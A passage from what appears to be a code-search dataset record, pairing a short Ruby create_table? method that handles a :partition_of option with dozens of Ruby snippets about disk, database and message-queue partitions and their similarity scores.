\"\"\n\n # is a linux fs, can be a root fs, has a fs name\n if part_fs != nil && Ops.get(i, :fstype) != nil &&\n CanBeLinuxRootFS(part_fs) &&\n part_fs_name != nil\n fs = Builtins.sformat(\n _(\"%1 (%2)\"),\n Ops.get_string(i, :fstype, \"\"),\n part_fs_name\n )\n else\n fs = Ops.get_string(i, :fstype, Ops.get_string(i, :fs, \"\"))\n end\n # Table item (unknown file system)\n fs = _(\"Unknown\") if fs == \"\"\n\n label = Ops.get_string(i, :label, \"\")\n\n part_list = Builtins.add(\n part_list,\n Item(Id(partition), system, partition, arch, fs, label)\n )\n end\n end\n deep_copy(part_list)\n end",
"def partition_used(partition)\n # Return magic number if in test_mode to prevent syscall\n return '128' if @test_mode\n b = ' ' * 128\n syscall(137, partition, b)\n a = b.unpack('QQQQQ')\n [a[2] * blocks_per_kilobyte, a[4] * blocks_per_kilobyte]\n end",
"def addPartition(ptStr)\n @mOdpsTable.addPartition(ptStr)\n end",
"def partitions\n topics.values.flat_map(&:partitions)\n end",
"def CreatePartition(disk, device, ptype, id, start, len, mby)\n Builtins.y2milestone(\n \"CreatePartition disk:%1 device:%2 ptype:%3 id:%4 start:%5 len:%6 mby:%7\",\n disk,\n device,\n ptype,\n id,\n start,\n len,\n mby\n )\n pt = fromSymbol(@conv_ptype, ptype)\n Builtins.y2milestone(\"CreatePartition type:%1 pt:%2\", ptype, pt)\n ret, cdev = @sint.createPartition(disk, pt, start, len)\n cdev = \"\" if ret<0\n if device != cdev\n Builtins.y2error(\"CreatePartition device:%1 cdev:%2\", device, cdev)\n end\n Builtins.y2error(\"CreatePartition ret %1\", ret) if ret<0\n ret = @sint.changePartitionId(device, id)\n Builtins.y2error(\"CreatePartition ret %1\", ret) if ret<0\n tmp = fromSymbol(@conv_mountby, mby)\n @sint.changeMountBy(device, tmp)\n Builtins.y2milestone(\"CreatePartition sint ret:%1\", ret)\n UpdateTargetMap()\n ret == 0\n end",
"def partition\n return enum_for(:partition) if not block_given?\n a,b = super\n [self.class.new(a), self.class.new(b)].freeze\n end",
"def create_partition(size = nil, type = Partition.PartitionType[:TYPE_PRIMARY])\n DiskUtils.create_partition self, size[:start_block], size[:end_block]\n partitions = Device.find(self).partitions\n return partitions.last\n end",
"def partition\n PredicatePartition.new(predicate, operand.left.header, operand.right.header)\n end",
"def add_partition_key(name, type)\n PartitionKey.new(name, type(type)).tap do |column|\n @partition_key_columns << add_column(column)\n end\n end",
"def GetPartitionList\n deep_copy(@partition_info)\n end",
"def create_list_partition_of(parent_table_name, options)\n if options[:values].blank? && options[:default].blank?\n raise ArgumentError, 'values or default must be defined'\n end\n\n Tablature.database.create_list_partition_of(parent_table_name, options)\n end",
"def partition_lookup\n return @partition_lookup unless @partition_lookup.nil?\n io = _root._io\n _pos = io.pos\n io.seek(_root.sector_size)\n @_raw_partition_lookup = io.read_bytes(sector_size)\n _io__raw_partition_lookup = Kaitai::Struct::Stream.new(@_raw_partition_lookup)\n @partition_lookup = PartitionEntry.new(_io__raw_partition_lookup, self, @_root)\n io.seek(_pos)\n @partition_lookup\n end",
"def dynamic_partition(data, partitions, num_partitions, name: nil)\n result = _op(:dynamic_partition, data, partitions, num_partitions: num_partitions, name: nil)\n num_partitions.times.map do |index|\n result[index]\n end\n end",
"def list_partitions_with_size_and_type # by nelsongs. => list: partition size type\n\treturn `fdisk -l | grep /dev | grep -v Disk | awk '{if ($2==\"*\") print $1\":\"$5\":\"$6;else print $1\":\"$4\":\"$5}' | sed s/+//g`.split\nend",
"def dump_partition_indexes(partitioned_table, stream)\n return unless Tablature.database.respond_to?(:indexes_on)\n\n indexes = Tablature.database.indexes_on(partitioned_table.name)\n return if indexes.empty?\n\n add_index_statements = indexes.map do |index|\n table_name = remove_prefix_and_suffix(index.table).inspect\n \" add_index #{([table_name] + index_parts(index)).join(', ')}\"\n end\n\n stream.puts add_index_statements.sort.join(\"\\n\")\n stream.puts\n end",
"def onepartition2fstab(part, other_nr)\n part = deep_copy(part)\n Builtins.y2milestone(\"onepartition2fstab part=%1\", part)\n if Ops.get_boolean(part, \"delete\", false) ||\n Ops.get_symbol(part, \"type\", :unknown) == :extended ||\n Builtins.contains(\n [:lvm, :sw_raid, :evms],\n Ops.get_symbol(part, \"type\", :unknown)\n ) &&\n Builtins.size(Ops.get_string(part, \"mount\", \"\")) == 0 ||\n Ops.get_symbol(part, \"enc_type\", :none) != :none &&\n !Ops.get_boolean(part, \"noauto\", false) ||\n !IsUsedBy(part) ||\n Builtins.contains(\n [\n Partitions.fsid_prep_chrp_boot,\n Partitions.fsid_lvm,\n Partitions.fsid_raid\n ],\n Ops.get_integer(part, \"fsid\", 0)\n ) &&\n Builtins.size(Ops.get_string(part, \"mount\", \"\")) == 0\n return {}\n end\n\n spec = Ops.get_string(part, \"device\", \"\")\n if Ops.get_symbol(part, \"mountby\", :device) == :label &&\n Ops.greater_than(Builtins.size(Ops.get_string(part, \"label\", \"\")), 0)\n spec = Builtins.sformat(\"LABEL=%1\", Ops.get_string(part, \"label\", \"\"))\n elsif Ops.get_symbol(part, \"mountby\", :device) == :uuid &&\n Ops.greater_than(Builtins.size(Ops.get_string(part, \"uuid\", \"\")), 0)\n spec = Builtins.sformat(\"UUID=%1\", Ops.get_string(part, \"uuid\", \"\"))\n end\n Builtins.y2debug(\"onepartition2fstab spec=%1\", spec)\n mount_point = Ops.get_string(part, \"mount\", \"\")\n fsid = Ops.get_integer(part, \"fsid\", 0)\n\n used_fs = Ops.get_symbol(part, \"used_fs\", :ext2)\n format = Ops.get_boolean(part, \"format\", false)\n\n vfstype = \"unknown\" # keep \"unknown\", used again below\n freq = 0\n passno = 0\n mntops = Ops.get_string(part, \"fstopt\", \"\")\n\n if mount_point == \"swap\"\n vfstype = \"swap\"\n if Builtins.isempty(mntops)\n mntops = Ops.get_string(\n FileSystems.GetFstabDefaultMap(\"swap\"),\n \"mntops\",\n \"\"\n )\n end\n passno = 0\n elsif fsid == Partitions.fsid_native || fsid == Partitions.fsid_lvm ||\n Ops.get_symbol(part, \"type\", :unknown) == :evms &&\n Ops.get_symbol(part, \"detected_fs\", :none) != :unknown\n vfstype = FileSystems.GetMountString(used_fs, format ? 
\"ext2\" : \"auto\")\n\n freq = 1\n if mount_point == \"/\"\n passno = 1\n elsif mount_point != \"\"\n passno = 2\n elsif Stage.initial && !Arch.s390\n mount_point = Ops.add(\"/data\", other_nr.value)\n # Don't mount and fsck this filesystem during boot, its\n # state is unknown.\n mntops = \"noauto,user\"\n vfstype = \"auto\"\n freq = 0\n passno = 0\n other_nr.value = Ops.add(other_nr.value, 1)\n Builtins.y2milestone(\"TT add MountPoint %1\", mount_point)\n end\n elsif (Arch.i386 || Arch.ia64 || Arch.x86_64) &&\n Ops.greater_than(Builtins.size(mount_point), 0) &&\n (used_fs == :vfat || used_fs == :ntfs) &&\n (Builtins.contains(\n Builtins.union(\n Builtins.union(\n Partitions.fsid_dostypes,\n Partitions.fsid_ntfstypes\n ),\n Partitions.fsid_wintypes\n ),\n fsid\n ) ||\n fsid == Partitions.fsid_gpt_boot)\n freq = 0\n passno = 0\n lower_point = Builtins.tolower(mount_point)\n if lower_point != \"\" && mount_point != lower_point\n lower_point = PathToDestdir(lower_point)\n Builtins.y2milestone(\n \"symlink %1 -> %2\",\n Builtins.substring(\n mount_point,\n Ops.add(Builtins.findlastof(mount_point, \"/\"), 1)\n ),\n lower_point\n )\n SCR.Execute(\n path(\".target.symlink\"),\n Builtins.substring(\n mount_point,\n Ops.add(Builtins.findlastof(mount_point, \"/\"), 1)\n ),\n lower_point\n )\n end\n vfstype = FileSystems.GetMountString(used_fs, \"auto\")\n elsif (Arch.sparc || Arch.alpha) &&\n Builtins.contains(Partitions.fsid_skipped, fsid)\n return {} # skip \"whole disk\" partition\n else\n return {} # unknown type\n end\n if Ops.get_symbol(part, \"detected_fs\", :unknown) == :unknown ||\n Ops.get_boolean(part, \"noauto\", false)\n passno = 0\n end\n\n ret = {\n \"spec\" => spec,\n \"mount\" => mount_point,\n \"vfstype\" => vfstype,\n \"mntops\" => mntops,\n \"freq\" => freq,\n \"device\" => Ops.get_string(part, \"device\", \"\"),\n \"passno\" => passno\n }\n\n if Builtins.size(Ops.get_string(ret, \"mntops\", \"\")) == 0\n Ops.set(ret, \"mntops\", \"defaults\")\n end\n\n Builtins.y2milestone(\"onepartition2fstab ret=%1\", ret)\n deep_copy(ret)\n end",
"def partitions_to_append(partition_start_timestamp, partition_size_unit, partition_size, days_into_future)\n _validate_positive_fixnum(:days_into_future, days_into_future)\n\n end_timestamp = @tuc.advance(current_timestamp, :days, days_into_future)\n partitions_to_append_by_ts_range(partition_start_timestamp, end_timestamp, partition_size_unit, partition_size)\n end",
"def on_partitions_assigned(_, partitions)\n @assigned_partitions = partitions.to_h.transform_values { |part| part.map(&:partition) }\n @changed = true\n end",
"def partitioned_state\n super\n end",
"def setPartitionType(settings)\n settings = deep_copy(settings)\n tm = Storage.GetTargetMap\n settings = Builtins.maplist(settings) do |d|\n if Ops.get_symbol(d, \"type\", :x) == :CT_DISK\n mp = Ops.get_integer(\n tm,\n [Ops.get_string(d, \"device\", \"xxx\"), \"max_primary\"],\n 0\n )\n if Ops.greater_than(mp, 0)\n Ops.set(\n d,\n \"partitions\",\n Builtins.maplist(Ops.get_list(d, \"partitions\", [])) do |pe|\n if Builtins.haskey(pe, \"partition_nr\") &&\n !Builtins.haskey(pe, \"partition_type\") &&\n Ops.less_or_equal(\n Ops.get_integer(pe, \"partition_nr\", -1),\n mp\n )\n Ops.set(pe, \"partition_type\", \"primary\")\n end\n deep_copy(pe)\n end\n )\n end\n end\n deep_copy(d)\n end\n Builtins.y2milestone(\"after setPartitionType = %1\", settings)\n deep_copy(settings)\n end",
"def query_partitions(partition_filter, statement, options = nil)\n policy = create_policy(options, QueryPolicy, default_query_policy)\n new_policy = policy.clone\n\n nodes = @cluster.nodes\n if nodes.empty?\n raise Aerospike::Exceptions::Aerospike.new(Aerospike::ResultCode::SERVER_NOT_AVAILABLE, \"Query failed because cluster is empty.\")\n end\n\n # result recordset\n recordset = Recordset.new(policy.record_queue_size, 1, :query)\n tracker = PartitionTracker.new(policy, nodes, partition_filter)\n Thread.new do\n Thread.current.abort_on_exception = true\n QueryExecutor.query_partitions(@cluster, policy, tracker, statement, recordset)\n end\n\n recordset\n end",
"def partition_selector\n @subhash = {}\n @filters = {}\n\n partition_selector_hash @selector, []\n end",
"def partitions_to_append_by_ts_range(partition_start_timestamp, end_timestamp, partition_size_unit, partition_size)\n if partition_size_unit.nil? || !VALID_PARTITION_SIZE_UNITS.include?(partition_size_unit)\n _raise_arg_err \"partition_size_unit must be one of: #{VALID_PARTITION_SIZE_UNITS.inspect}\"\n end\n\n _validate_positive_fixnum(:partition_size, partition_size)\n _validate_positive_fixnum(:partition_start_timestamp, partition_start_timestamp)\n _validate_positive_fixnum(:end_timestamp, end_timestamp)\n\n timestamp = partition_start_timestamp\n\n partitions_to_append = {}\n while timestamp < end_timestamp\n timestamp = @tuc.advance(timestamp, partition_size_unit, partition_size)\n\n partition_name = name_from_timestamp(timestamp)\n partitions_to_append[partition_name] = timestamp\n end\n\n partitions_to_append\n end",
"def partition_params\n params.require(:partition).permit(:name, :body, :chapter_id)\n end",
"def add_partition_to_node( tp, node )\n\n @nodes_lists_replicas[node][tp] = ''\n @partitions_lists[tp]['replicas'] ||= {}\n @partitions_lists[tp]['replicas'][node] = ''\n end",
"def parent_table_schema_name(*partition_key_values)\n return collect_first(*partition_key_values, &:parent_table_schema_name)\n end",
"def parent_table_name(*partition_key_values)\n return collect_first(*partition_key_values, &:parent_table_name)\n end",
"def key_partition\n Dynamoid::Config.partitioning? ? \".#{Random.rand(Dynamoid::Config.partition_size)}\" : ''\n end",
"def hadoop_partition_args\n if options[:partition_fields]\n [\n '-partitioner org.apache.hadoop.mapred.lib.KeyFieldBasedPartitioner',\n jobconf(:output_field_separator),\n jobconf(:partition_fields),\n ]\n end\n end",
"def partitions(key, partitions)\n master = fnv_hash(key) % partitions.size\n selected = [master]\n nodes = [partitions[master]]\n current = (master + 1) % partitions.size\n\n # Walk clockwise around the ring of partitions, starting from the master partition.\n # The next few unique nodes in ring order are the replicas.\n while current != master && selected.size < @replicas\n if !nodes.include? partitions[current]\n nodes << partitions[current]\n selected << current\n end\n current = (current + 1) % partitions.size\n end\n\n selected\n end",
"def create_partition_to_fill_disk(disk)\n # @disk.create_partition('primary', '100%')\n disk.create_partition_table # LinuxAdmin::Disk.create_partition has this already...\n AwesomeSpawn.run!(\"parted -s #{disk.path} mkpart primary 0% 100%\")\n\n # FIXME: Refetch the disk after creating the partition\n disk = LinuxAdmin::Disk.local.find { |d| d.path == disk.path }\n disk.partitions.first\n end",
"def partition(arr, n)\n\nend",
"def isPartition(partition)\n partition = deep_copy(partition)\n AutoinstCommon.isValidObject(@fields, partition)\n end",
"def create_with_partition(partition)\n NicView.new(fqdd.gsub(/[-]\\d+$/, \"-#{partition}\"))\n end",
"def split_partitions\n partition_names = @list.map { |bin| bin.partition_names }.flatten\n partition_names.select { |name| partition_names.index(name) != partition_names.rindex(name) }.uniq\n end",
"def GetPartitionLst(tg, device)\n tg = deep_copy(tg)\n ret = []\n tmp = GetDiskPartitionTg(device, tg)\n Builtins.y2milestone(\"GetPartitionLst tmp:%1\", tmp)\n Builtins.foreach(tmp) do |m|\n disk = Ops.get_string(m, \"disk\", \"\")\n if Builtins.search(device, \"/dev/evms\") == 0 &&\n !Builtins.haskey(tg, disk)\n disk = \"/dev/evms\"\n end\n Builtins.y2debug(\"GetPartitionLst device=%1 disk=%2\", device, disk)\n part = Builtins.filter(Ops.get_list(tg, [disk, \"partitions\"], [])) do |p|\n Ops.get_string(p, \"device\", \"\") == device\n end\n part = Builtins.filter(part) { |p| !Ops.get_boolean(p, \"delete\", false) }\n if Builtins.size(part) == 0 && Ops.is_integer?(Ops.get(m, \"nr\", 0))\n part = Builtins.filter(Ops.get_list(tg, [disk, \"partitions\"], [])) do |p|\n Ops.get_integer(p, \"nr\", -1) == Ops.get_integer(m, \"nr\", 0)\n end\n part = Builtins.filter(part) do |p|\n !Ops.get_boolean(p, \"delete\", false)\n end\n end\n if Builtins.size(part) == 0\n part = Builtins.filter(Ops.get_list(tg, [disk, \"partitions\"], [])) do |p|\n Ops.get_string(p, \"name\", \"\") == Ops.get_string(m, \"nr\", \"\")\n end\n part = Builtins.filter(part) do |p|\n !Ops.get_boolean(p, \"delete\", false)\n end\n end\n pa = Ops.get(part, 0, {})\n if Builtins.size(pa) == 0 &&\n Builtins.search(device, \"/dev/mapper/\") == 0\n part = Builtins.filter(\n Ops.get_list(tg, [\"/dev/mapper\", \"partitions\"], [])\n ) { |p| Ops.get_string(p, \"device\", \"\") == device }\n pa = Ops.get(part, 0, {})\n end\n if Builtins.size(pa) == 0 &&\n Builtins.search(device, \"/dev/mapper/\") == 0\n part = Builtins.filter(\n Ops.get_list(tg, [\"/dev/loop\", \"partitions\"], [])\n ) { |p| Ops.get_string(p, \"device\", \"\") == device }\n pa = Ops.get(part, 0, {})\n end\n ret = Builtins.add(ret, pa) if Ops.greater_than(Builtins.size(pa), 0)\n end\n Builtins.y2debug(\"GetPartitionLst ret=%1\", ret)\n deep_copy(ret)\n end",
"def create_tables\n x = 1\n table_count = (all_guests.length / table_size_limit.to_f).ceil\n while x <= table_count\n Table.create(table_number: x, table_size_limit: table_size_limit, event_id: id)\n x += 1\n end\n end",
"def partition(partition_key)\n state_depth_must_be(States::RELATION)\n if @current_relation.partitions.include?(partition_key)\n raise \"duplicate partition key #{partition_key}\"\n end\n @current_relation.partitions << partition_key\n end",
"def table_elements(identifier)\n platform.tables_for(identifier.clone)\n end",
"def list_swap_partitions_with_type_and_size # nelsongs\n\treturn `fdisk -l | grep /dev | grep -v Disk | awk '{if ($2==\"*\" && $6==\"82\") print $1\":\"$5\":\"$6;else {if ($5==\"82\") print $1\":\"$4\":\"$5}}' | sed s/+//g`.chomp.split\nend",
"def partition_pattern(prefix, partitioned)\n pattern = case partitioned\n when :weekly\n Array.new(8, '_').join\n when :monthly\n Array.new(6, '_').join\n else\n raise \"Unrecognized option for 'partitioned': #{partitioned}\"\n end\n \"#{prefix}_#{pattern}\"\n end",
"def partition(predicate)\n each_operand(predicate) do |operand|\n case operand\n when Axiom::Function::Binary then partition_binary(operand)\n when Axiom::Function::Unary then partition_unary(operand)\n when Axiom::Attribute::Boolean then partition_attribute(operand)\n else\n partition_proposition(operand)\n end\n end\n end",
"def bootloader_partitions\n raise RuntimeError, \"Not implemented in base class\"\n end",
"def supports_list_partitions?\n postgresql_version >= 100_000\n end",
"def indexes_on(partitioned_table)\n return [] if Gem::Version.new(Rails.version) >= Gem::Version.new('6.0.3')\n return [] unless connection.supports_indexes_on_partitioned_tables?\n\n Indexes.new(connection).on(partitioned_table)\n end",
"def available_partitions\n partitions.select(&:available?)\n end",
"def problem_76\n return 100.partitions - 1\nend",
"def partition( header, &block )\n data.partition( header, &block ).map { |d| dup.load( d ) }\n end",
"def partition_and_process_non_tabular_lines\n non_tabular_lines.each do |line|\n if line =~ @start_line_pattern\n # This is a start line\n start_record(line)\n elsif line =~ @end_line_pattern\n # This is an end line\n end_record(line)\n else\n @non_tabular_record << line if @in_a_record\n end\n end\n end",
"def partition_check_device(devicename)\n if External.cmd(@server, \"/usr/bin/sudo /sbin/fdisk -l #{devicename}\").include? \"Disk #{devicename} doesn't contain a valid partition table\"\n false\n else\n true\n end\n end",
"def partition\n @articles.each do |article|\n minimum_bucket(article['read_time'].to_i) << article\n end\n end",
"def IsPartitionable(entry)\n entry = deep_copy(entry)\n Ops.get_symbol(entry, \"type\", :CT_UNKNOWN) == :CT_DMRAID ||\n Ops.get_symbol(entry, \"type\", :CT_UNKNOWN) == :CT_DMMULTIPATH ||\n Ops.get_symbol(entry, \"type\", :CT_UNKNOWN) == :CT_MDPART ||\n IsRealDisk(entry)\n end",
"def write(table,data,partition_key=nil)\n\n ## Get table schema...\n schema = get_table_schema(table)\n\n if schema == nil\n raise \"Scheme does not exist for table name ='#{table}'\"\n end\n\n ## Ensure that the keys in the passed data are symbols (this is what's expected)\n data.keys.each do |key|\n if(key.is_a?(Symbol) == false)\n raise \"Data key #{key} is not a symbol!\"\n # TODO: CONVERT string keys to symbols instead of raising\n end\n end\n\n intersection = schema[:columns].keys & data.keys\n\n ## Validate no data keys are passed that are not in table schema\n data.keys.each do |key|\n if(intersection.include?(key) == false)\n raise \"Data key #{key} is not in schema for #{table} table!!\"\n end\n end\n\n ## Validate that columns are not null\n schema[:columns].each do |column_name,column|\n if(column.keys.include?(:constraint) == true && column[:constraint] == \"not null\" && intersection.include?(column_name) == false)\n raise \"Column #{column_name} is missing from passed data\"\n end\n end\n\n ## Validate column types\n schema[:columns].each do |column_name,column|\n if(intersection.include?(column_name) == true)\n\n value = data[column_name.to_sym]\n column_type = column[:type]\n\n if column_type['('] != nil\n type_name = column_type[/(.*)\\(.*/,1]\n else\n type_name = column_type\n end\n\n type_name_downcased = type_name.downcase\n\n if @valid_data_types.include? type_name_downcased\n type_name_check_function = \"check_#{type_name_downcased.gsub(' ','_')}\".to_sym\n data[column_name.to_sym] = @data_types.send(type_name_check_function,value,column_type,column_name)\n else\n raise \"Invalid data type #{type_name}. Valid types [#{@valid_data_types.join(\",\")}]\"\n end\n end\n end\n\n ## Serialize as json, we load the data as JSON into redshift\n data_string=data.to_json\n\n ## Write the serialized data string to the broker\n partition_key = partition_key || rand(100).to_s\n stream_name = @broker.stream_name(table)\n result = @broker.stream_write(stream_name, data_string, partition_key)\n\n return result\n end",
"def query(statement, options = nil)\n query_partitions(Aerospike::PartitionFilter.all, statement, options)\n end",
"def partition(&block) # :nodoc:\n resolve\n result = @items.partition(&block)\n [\n self.class.new.import(result[0]),\n self.class.new.import(result[1]),\n ]\n end",
"def test_0260_partition\n @@log.debug \"test_0260_partition starts\" if @@log.debug?\n assert_respond_to(@list, :partition, \"test_0260_partition_respond\")\n # Basic partition\n ta = @list.partition {|obj| obj.ndata >= 3 }\n assert_equal(2, ta.size,\"test_0260_partition_basic_01\")\n # First array: block evaluated to true\n assert_equal([@aen, @bsb], ta[0], \"test_0260_partition_basic_02\")\n # Second array: block evaluated to false\n assert_equal([@cab, @dad], ta[1], \"test_0260_partition_basic_03\")\n # Check Enumerator or Enumerable::Enumerator return, no block given\n # This form not documented by the 1.8 Pickaxe.\n new_list = @list.partition\nif RUBY_VERSION >= \"1.9\"\n result = new_list.is_a? Enumerator\n assert(result, \"test_0260_partition_enumcheck\")\nelse\n # Note: the author's version of the 1.8 Pickaxe documents this\n # as an Array, however does not document this form of code at all.\n # YMMV.\n result = new_list.is_a? Enumerable::Enumerator\n assert(result, \"test_0260_partition_enumenumcheck\")\nend\n\n @@log.debug \"test_0260_partition ends\" if @@log.debug?\n end",
"def create_range_partition_of(parent_table_name, options)\n if (options[:range_start].nil? || options[:range_end].nil?) && options[:default].blank?\n raise ArgumentError, 'range_start and range_end or default must be defined'\n end\n\n Tablature.database.create_range_partition_of(parent_table_name, options)\n end",
"def FSCKPartition(partition)\n if !Mode.test\n detected_fs = Storage.DetectFs(partition)\n if detected_fs == :ext2\n # label, %1 is partition\n out = Builtins.sformat(_(\"Checking partition %1\"), partition)\n UI.OpenDialog(Opt(:decorated), Label(out))\n\n Builtins.y2milestone(\"command: /sbin/e2fsck -y %1\", partition)\n SCR.Execute(\n path(\".target.bash\"),\n Ops.add(\"/sbin/e2fsck -y \", partition)\n )\n\n UI.CloseDialog\n end\n end\n\n nil\n end",
"def setup\n @cypher_partition = CypherPartitioner.new\n end",
"def create\n begin\n # Set the partition (/dev/sdb1), device (/dev/sdb) and alignment (optimal,minimal,none etc.) variables\n partition= resource[:name]\n device=partition[0,(partition.length-1)]\n alignment= resource[:alignment]\n\n # Now we can create the partition\n partitions = parted('-a', resource[:alignment],'--script',device,'mklabel',resource[:part_label],'mkpart', resource[:part_type],resource[:fs_type],resource[:p_begin],resource[:p_end])\n rescue Puppet::ExecutionFailure => e\n false\n end\n end",
"def partition_devices(device_list, attempt = 0, max_attempts = 3)\n return false if attempt >= max_attempts\n\n puts case attempt\n when 0 then \"Partioning devices ...\" \n else \"Retrying device partitioning (attempt #{attempt + 1}) ...\" \n end\n\n device_list.each do |device|\n puts \" * #{device}\"\n `echo 0|sfdisk #{device}`\n end\n\n puts \"Sleeping 10 seconds to reload partition tables ...\"\n sleep 10\n\n # Verify all volumes were properly partitioned\n missing_devices = []\n device_list.each do |device|\n missing_devices << device unless File.exists?(\"#{device}1\")\n end\n\n # Retry partitioning for failed volumes\n response = true\n if missing_devices.size > 0\n response = partition_devices(missing_devices, attempt + 1, max_attempts)\n end\n response\n end",
"def supports_default_partitions?\n postgresql_version >= 110_000\n end",
"def delete_table_or_partition(table, dataset: nil)\n begin\n dataset ||= @dataset\n Embulk.logger.info { \"embulk-output-bigquery: Delete table... #{@destination_project}:#{dataset}.#{table}\" }\n with_network_retry { client.delete_table(@destination_project, dataset, table) }\n rescue Google::Apis::ServerError, Google::Apis::ClientError, Google::Apis::AuthorizationError => e\n if e.status_code == 404 && /Not found:/ =~ e.message\n # ignore 'Not Found' error\n return\n end\n\n response = {status_code: e.status_code, message: e.message, error_class: e.class}\n Embulk.logger.error {\n \"embulk-output-bigquery: delete_table(#{@destination_project}, #{dataset}, #{table}), response:#{response}\"\n }\n raise Error, \"failed to delete table #{@destination_project}:#{dataset}.#{table}, response:#{response}\"\n end\n end",
"def split(table_or_region_name, split_point = nil)\n split_point_bytes = nil\n split_point_bytes = split_point.to_java_bytes unless split_point.nil?\n begin\n if split_point_bytes.nil?\n org.apache.hadoop.hbase.util.FutureUtils.get(@admin.splitRegionAsync(table_or_region_name.to_java_bytes))\n else\n org.apache.hadoop.hbase.util.FutureUtils.get(@admin.splitRegionAsync(table_or_region_name.to_java_bytes, split_point_bytes))\n end\n rescue java.lang.IllegalArgumentException, org.apache.hadoop.hbase.UnknownRegionException\n if split_point_bytes.nil?\n @admin.split(TableName.valueOf(table_or_region_name))\n else\n @admin.split(TableName.valueOf(table_or_region_name), split_point_bytes)\n end\n end\n end",
"def shared_slice(hash_)\n offset_ = @offset\n select_set_ = {}\n hash_.each do |k_, v_|\n if (ainfo_ = @structure.axis(k_))\n aindex_ = ainfo_.axis_index\n unless select_set_.include?(aindex_)\n lindex_ = ainfo_.index(v_)\n if lindex_\n offset_ += ainfo_.step * lindex_\n select_set_[aindex_] = true\n end\n end\n end\n end\n Table.new(@structure.substructure_omitting(select_set_.keys),\n :acquire => @vals, :offset => offset_, :parent => self)\n end",
"def list_swap_partitions_with_size # nelsongs\n\treturn `fdisk -l | grep /dev | grep -v Disk | awk '{if ($2==\"*\" && $6==\"82\") print $1\":\"$5;else {if ($5==\"82\") print $1\":\"$4}}' | sed s/+//g`.chomp.split\nend",
"def partitions_for(topic=nil)\n if topic.class == String && block_given?\n @j_del.java_method(:partitionsFor, [Java::java.lang.String.java_class,Java::IoVertxCore::Handler.java_class]).call(topic,(Proc.new { |ar| yield(ar.failed ? ar.cause : nil, ar.succeeded ? ar.result.to_a.map { |elt| elt != nil ? JSON.parse(elt.toJson.encode) : nil } : nil) }))\n return self\n end\n raise ArgumentError, \"Invalid arguments when calling partitions_for(#{topic})\"\n end",
"def n_partitions\n return 4 if is_qlogic_57810?\n return 2 if is_qlogic_57840?\n return 2 if is_qlogic_57800? && port.between?(1, 2)\n\n 1\n end",
"def supports_hash_partitions?\n postgresql_version >= 110_000\n end",
"def compute_table_list\n if @configuration.download_tables\n # If the list is explicitly set then use that\n tables = @configuration.download_tables.to_set\n else\n # Otherwise guess via the tables actually in the database\n tables = @adapter.guess_tables.to_set\n\n if @configuration.allow_tables\n # Only allow tables tables that we specify\n tables = tables.intersection @configuration.allow_tables\n end\n if @configuration.disallow_tables\n # Remove any tables that we don't want included\n tables = tables.difference @configuration.disallow_tables\n end\n end\n return tables\n end",
"def add_partition_to_all_lowest( tp, nb_partitions_to_add )\n\n nodes_sizes_replicas = @nodes_lists_replicas.hmap { |k,v| { k => v.size } }\n nodes_lowest = nodes_sizes_replicas.sort_by{|k,v| v}.map { |a| a[0] }\n\n nodes_lowest.each do |node|\n break if nb_partitions_to_add <= 0\n\n unless @nodes_lists_replicas[node].has_key?(tp)\n add_partition_to_node( tp, node )\n nb_partitions_to_add -= 1\n end\n end\n end",
"def prepare_tables\n table_id = 0\n seen = {}\n\n sheets.each do |sheet|\n table_id += sheet.prepare_tables(table_id + 1, seen)\n end\n end",
"def create_download_session(table_name, partition = nil)\n if partition\n url = \"projects/#{ODPS.current_project}/tables/#{table_name}?partition=#{partition}&downloads\"\n else\n url = \"projects/#{ODPS.current_project}/tables/#{table_name}?downloads\"\n end\n res = ODPS.tunnel_conn.post do |req|\n req.url url\n req.headers['Content-Type'] = 'application/json'\n end\n JSON.parse res.body, {object_class: DownloadSession}\n end",
"def available_tables(sets_of_dishes, places_per_table)\n# dishes / seats\n return sets_of_dishes / places_per_table\nend",
"def from(value)\n using(partition: value)\n end",
"def roomer_set_table_name_prefix\n self.table_name_prefix = begin\n case @roomer_scope\n when :shared\n roomer_full_table_name_prefix(Roomer.shared_schema_name)\n when :tenanted\n roomer_full_table_name_prefix(Roomer.current_tenant.try(Roomer.tenant_schema_name_column))\n else\n \"\"\n end\n end\n end",
"def create(key_hash)\n # TODO: Raise if a key missing\n @model.transaction do\n partition = partition_class.create!(key_hash)\n @keys.create_partition_tables(@model, :key_hash => key_hash)\n # TODO: Indexes\n partition\n end\n end",
"def pdf_split(input, from, to, output)\n if from == to\n range = from\n else\n range = \"#{from}-#{to}\"\n end\n\n options = [\n input.shellescape,\n 'cat',\n range,\n 'output',\n output.shellescape\n ]\n `pdftk #{options.join(' ')}`\n end"
] |
[
"0.73846465",
"0.6675539",
"0.6539488",
"0.64836276",
"0.62881833",
"0.62800586",
"0.6146445",
"0.61269706",
"0.591312",
"0.58228123",
"0.5668915",
"0.5609678",
"0.5595541",
"0.5555945",
"0.551449",
"0.5510789",
"0.54816824",
"0.5454161",
"0.5439815",
"0.5434736",
"0.54189837",
"0.54128647",
"0.54043686",
"0.53812325",
"0.53622264",
"0.5323417",
"0.53059185",
"0.53015864",
"0.5296457",
"0.5295068",
"0.5281782",
"0.5251936",
"0.52349216",
"0.52312136",
"0.5177959",
"0.517098",
"0.5167387",
"0.5163342",
"0.515311",
"0.5134142",
"0.5130608",
"0.5090029",
"0.5083142",
"0.5075859",
"0.5072916",
"0.50681",
"0.50615853",
"0.50610703",
"0.5052428",
"0.5042386",
"0.5040075",
"0.50353855",
"0.5031691",
"0.5025889",
"0.5007001",
"0.4995957",
"0.49706742",
"0.49566785",
"0.49466935",
"0.49462467",
"0.49121296",
"0.49092722",
"0.49051452",
"0.48979992",
"0.4892523",
"0.4889925",
"0.48532698",
"0.48530328",
"0.48522872",
"0.48386073",
"0.4835996",
"0.48252448",
"0.4821992",
"0.48197308",
"0.48114815",
"0.4799706",
"0.47959927",
"0.47837287",
"0.47576353",
"0.4746385",
"0.47330135",
"0.4719982",
"0.47072312",
"0.47033805",
"0.46882743",
"0.46784094",
"0.46745926",
"0.4671777",
"0.46680787",
"0.46401706",
"0.46363577",
"0.4634225",
"0.4631247",
"0.46204904",
"0.46139807",
"0.46006274",
"0.46002066",
"0.4599468",
"0.45961404",
"0.45955232"
] |
0.64252746
|
4
|
Support partitions of tables using the :partition_of option.
|
def create_table?(name, options=OPTS, &block)
if options[:partition_of]
create_table(name, options.merge!(:if_not_exists=>true), &block)
return
end
super
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
